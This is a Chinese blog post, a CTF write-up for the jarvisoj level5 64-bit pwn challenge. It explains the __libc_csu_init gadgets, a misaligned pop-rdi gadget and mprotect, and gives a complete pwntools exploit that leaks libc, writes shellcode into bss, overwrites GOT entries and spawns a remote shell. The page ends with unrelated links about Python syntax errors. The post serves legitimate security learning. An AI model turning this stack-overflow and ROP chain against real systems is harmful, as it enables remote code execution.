pwn学习-jarvisoj-level5

最新推荐文章于 2022-09-07 15:28:26 发布
最新推荐文章于 2022-09-07 15:28:26 发布
阅读量399 收藏 3
点赞数
分类专栏: pwn 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45653588/article/details/111549850
版权

mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。

mprotect()函数

在Linux中,mprotect()函数可以用来修改一段指定内存区域的保护属性。mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。

int mprotect(const void *start, size_t len, int prot);

port:(读4,写2,执行1)

由于64位下函数传参前六个参数依次保存在RDI, RSI, RDX, RCX, R8 和 R9 下,而一般不存在有关rdx的gadgets。

在学习了大佬的wp后学到了利用__libc_csu_init的通用gadgets。

通用gadgets __libc_csu_init 的使用。

__libc_csu_init函数是程序调用libc库用来对程序进行初始化的函数,一般先于main函数执行。

下面是__libc_csu_init函数的汇编代码。

.text:0000000000400650
.text:0000000000400650 ; =============== S U B R O U T I N E =======================================
.text:0000000000400650
.text:0000000000400650
.text:0000000000400650 ; void _libc_csu_init(void)
.text:0000000000400650                 public __libc_csu_init
.text:0000000000400650 __libc_csu_init proc near               ; DATA XREF: _start+16↑o
.text:0000000000400650 ; __unwind {
.text:0000000000400650                 push    r15
.text:0000000000400652                 mov     r15d, edi
.text:0000000000400655                 push    r14
.text:0000000000400657                 mov     r14, rsi
.text:000000000040065A                 push    r13
.text:000000000040065C                 mov     r13, rdx
.text:000000000040065F                 push    r12
.text:0000000000400661                 lea     r12, __frame_dummy_init_array_entry
.text:0000000000400668                 push    rbp
.text:0000000000400669                 lea     rbp, __do_global_dtors_aux_fini_array_entry
.text:0000000000400670                 push    rbx
.text:0000000000400671                 sub     rbp, r12
.text:0000000000400674                 xor     ebx, ebx
.text:0000000000400676                 sar     rbp, 3
.text:000000000040067A                 sub     rsp, 8
.text:000000000040067E                 call    _init_proc
.text:0000000000400683                 test    rbp, rbp
.text:0000000000400686                 jz      short loc_4006A6
.text:0000000000400688                 nop     dword ptr [rax+rax+00000000h]
.text:0000000000400690
.text:0000000000400690 loc_400690:                             ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400690                 mov     rdx, r13
.text:0000000000400693                 mov     rsi, r14
.text:0000000000400696                 mov     edi, r15d
.text:0000000000400699                 call    qword ptr [r12+rbx*8]
.text:000000000040069D                 add     rbx, 1
.text:00000000004006A1                 cmp     rbx, rbp
.text:00000000004006A4                 jnz     short loc_400690
.text:00000000004006A6
.text:00000000004006A6 loc_4006A6:                             ; CODE XREF: __libc_csu_init+36↑j
.text:00000000004006A6                 add     rsp, 8
.text:00000000004006AA                 pop     rbx
.text:00000000004006AB                 pop     rbp
.text:00000000004006AC                 pop     r12
.text:00000000004006AE                 pop     r13
.text:00000000004006B0                 pop     r14
.text:00000000004006B2                 pop     r15
.text:00000000004006B4                 retn
.text:00000000004006B4 ; } // starts at 400650
.text:00000000004006B4 __libc_csu_init endp
.text:00000000004006B4
.text:00000000004006B4 ; ---------------------------------------------------------------------------

__libc_csu_init其中两端特殊的gadget可以给我们利用。

gadget位于0x400690和0x4006AA两处。

0x4006AA处依次将参数存入寄存器rbx,rbp,r12,r13,r14,r15。

.text:00000000004006AA                 pop     rbx
.text:00000000004006AB                 pop     rbp
.text:00000000004006AC                 pop     r12
.text:00000000004006AE                 pop     r13
.text:00000000004006B0                 pop     r14
.text:00000000004006B2                 pop     r15
.text:00000000004006B4                 retn

0x400690处依次将r13,r14,r15寄存器里的值放到rdx,rsi,edi处

.text:0000000000400690                 mov     rdx, r13
.text:0000000000400693                 mov     rsi, r14
.text:0000000000400696                 mov     edi, r15d

在这还隐藏了两段gadget,可以利用错位码来得到

如上的例子中0x4006B2、0x4006B4两句的字节码如下

0x41 0x5f 0xc3

意思是pop r15,ret,但是恰好pop rdi,ret的opcode如下

0x5f 0xc3

因此如果我们指向0x4006B3就可以获得pop rdi,ret的opcode,从而对于单参数函数可以直接获得执行(涨姿势了)

实现

现在我们有了mprotect改data段到可执行,利用通用gadgets __libc_csu_init传参,可以将shellcode写到bss段,调用mprotect修改bss段权限,然后执行shellcode拿到shell。

下面是exp:

from pwn import *

io = remote('pwn2.jarvisoj.com', 9884)
#io = process('../level3')
elf = ELF('../level3')
libc = ELF('../libc-2.19.so')

rop1 = 0x4006A6       #pop_rbx_rbp_r12_r13_r14_r15
rop2 = 0x400690        #mov rdx,r13; mov rsi,r14; mov edi,r15d

vul_fun = elf.symbols['vulnerable_function']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
read_got = elf.got['read']
libc_start = elf.got['__libc_start_main']
mprotect_got = elf.got["__gmon_start__"]
bss = elf.bss()
rdi = 0x4006b3
rsi_r15_ret = 0x4006b1

io.recv()
payload = 'a' * (0x80 + 0x8) + p64(rdi) + p64(1) + p64(rsi_r15_ret) + p64(read_got) + p64(0) + p64(write_plt) + p64(vul_fun)
# write(1,read_got,#) ret vul_fun
# 利用write函数泄露read函数的真实地址
io.sendline(payload)

read_addr = u64(io.recvn(8))
libc_base = read_addr - libc.symbols["read"]
mprotect_addr = libc_base + libc.symbols["mprotect"]


print "read_addr ==> "+hex(read_addr)
print "libc_base ==> "+hex(libc_base)
print "mprotect_addr ==> "+hex(mprotect_addr)

io.recv()

payload = 'a' * (0x80 + 0x8) + p64(rdi) + p64(0) + p64(rsi_r15_ret) + p64(bss) + p64(0) + p64(read_plt) + p64(vul_fun)
# read(0, bss, #) ret vul_fun
# 利用read函数向bss段写入数据
io.sendline(payload)

shellcode = asm(shellcraft.amd64.linux.sh(), arch="amd64")
io.send(shellcode)
# 向bss段写入shellcode
io.recv()

bss_got = elf.got["__libc_start_main"]
payload = 'a' * (0x80 + 0x8) + p64(rdi) + p64(0) + p64(rsi_r15_ret) + p64(bss_got) + p64(0) + p64(read_plt) + p64(vul_fun)
# read(0, bss_got, #) ret vul_fun
# 利用read函数把shellcode的bss段的地址读入到.got.plt段去
io.sendline(payload)
io.sendline(p64(bss))
io.recv()



mprotect_got = elf.got["__gmon_start__"]
payload = 'a' * (0x80 + 0x8) + p64(rdi) + p64(0) + p64(rsi_r15_ret) + p64(mprotect_got) + p64(0) + p64(read_plt) + p64(vul_fun)
# read(0, mprotect_got, #) ret vul_fun
# 利用read函数把mprotect的地址读入到.got.plt段去
io.sendline(payload)
io.sendline(p64(mprotect_addr))


payload  = 'a' * (0x80 + 0x8) + p64(rop1) + "a" * 8 + p64(0) + p64(1)  + p64(mprotect_got) + p64(7) + p64(0x1000) + p64(0x600000)
                                                       #rbx     #rbp     #r12                #r13     #r14          #r15
                                                                                             #rdx     #rsi          #edi
# pop_rbx_rbp_r12_r13_r14_r15_ret
payload += p64(rop2) + "a" * 8 + p64(0) + p64(1) + p64(bss_got) + p64(0) + p64(0) + p64(0) + p64(rop2)
'''
mov     rdx, r13
mov     rsi, r14
mov     edi, r15d
'''
# mprotect(0x600000,0x1000,7)
io.recv()
io.sendline(payload)

io.interactive()
So4ms
关注
专栏目录
Python语法错误:SyntaxError: 'return' outside function
杨鑫newlife的专栏
08-02 7706
这种语法错误般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 278
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
SyntaxError: return outside function
逐梦人.的博客
10-10 1965
这种语法错误一般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
syntaxerror: 'return' outside function 解决办法
热门推荐
xb627586640的博客
03-16 9万+
出现syntaxerror: 'return' outside function是由于python对格式要求严格的原因,多半问题是由于格式对齐导致的 根据报错提示到相应的.py文件的相应行修改缩进,只需要保持缩进为1或着2个tab即可,修改后保存.py文件后再次运行,直到不再报错即可 问题解决!
SyntaxError: ‘return‘ outside function
追梦鸟
05-07 748
SyntaxError: ‘return’ outside function 方法:可能是拼写错误,或者位置不对或者方法头是class(有self),要改为def(无self)
SyntaxError: 'return' outside function 语法报错
linxun10000的博客
04-02 4947
贴出代码 for cc in range(1,11): if cc%2==0: LL.append(cc*cc) return LL 报错`SyntaxError: ‘return’ outside function 仔细查找后 在https://docs.python.org/3/ 官方文档中说明 The key word “return” which sh...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 534
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 287
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 493
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 385
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
SyntaxError: ‘return’ outside function 在python里面的报错问题
01-21
Return需要放在函数里面 报错情况: 报错代码: #coding=utf-8 def find_friend(type, height, sex): :param type: 0示周杰伦 1表示彭于晏 2表示霍建华 :param height: 他的身高是多少 :param sex: 性别 :return: 返回值 if type == 0: print(你的朋友是周杰伦,他的身高是:, height, 性别是:, sex) return True elif(type == 1): print
python运行出现SyntaxError: 'return' outside function的原因和解决办法
凯哥大数据——刘凯的博客
08-22 5万+
在写斐波那契数列代码时,编程思路是:如果正确打印了斐波那契数列,就返回0结束程序;如果输入有错,就继续重复执行输入,直到正确为止。 fibo = [0,1] while True: try: times = int(input("请输入斐波那契数列的长度:")) if times == 1: print(fibo[0:1]) ...
SyntaxError: 'return' outside function
zhanyingle_1981的专栏
11-18 698
SyntaxError: 'return' outside function 一般是由于缩进不对引起的,比如tab 和空格混合使用.........
Syntaxerror: ‘return‘ outside function 解析
Suzyyl的博客
01-07 1461
这种报错是因为return只能在函数当中使用,若没有在函数中使用就会报这个错误。 有很多帖子都说是因为缩进问题,如果缩进报错,则会出现 IndentationError: expected an indented block 实例: 原报错: 缩进报错: 修正: ...
Python中for循环中return报错了,SyntaxError:‘return‘ outside function
ynyeel的博客
09-07 2750
python中return的使用
'return' outside function
zhuguanzhong的博客
04-17 1277
在循环中 无论是while还是for 不能使用return。需要先用break跳出循环再做处理。
20201022_074.参数的传递_传递不可变对象_内存分析
MinskyYi的博客
10-22 144
传递不可变对象的引用 传递参数是不可变对象(例如:int、float、字符串、元组、布尔值等)时,实际传递过程还是对对象的引用。形成结果的”赋值操作”时,由于不可变对象无法修改,系统会新创建一个对象空间。 【案例】 b = 'abc' def f2(m): print('m:', id(m)) c = [m, 'de'] m = ''.join(c) print(m) print('m:', id(m)) print('b:', id(b))
Python报错SyntaxError :'return' outside function
给我一点温度
08-01 1万+
在for循环里面return想要跳出全部循环时,会报语法错误SyntaxError: 'return' outside function 原因是return只能写在def函数里面 # 没有def函数使用return,会报错 for x in range(3): print(x) for c in ['a', 'b', 'c']: print(c) ...
SyntaxError: 'return' outside function 解决办法
谷子的五福一安
03-24 9768
问题描述 SyntaxError: ‘return’ outside function 直接翻译是 return 这个关键字在函数的外面 解决方法 根据报错,我们知道return是不可以写在函数的外面的,和有些解答中说的python格式严格,没对齐空格什么的完全没有关系,只需要检查return是否写在了函数的外面即可。 PEACE~~ ...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值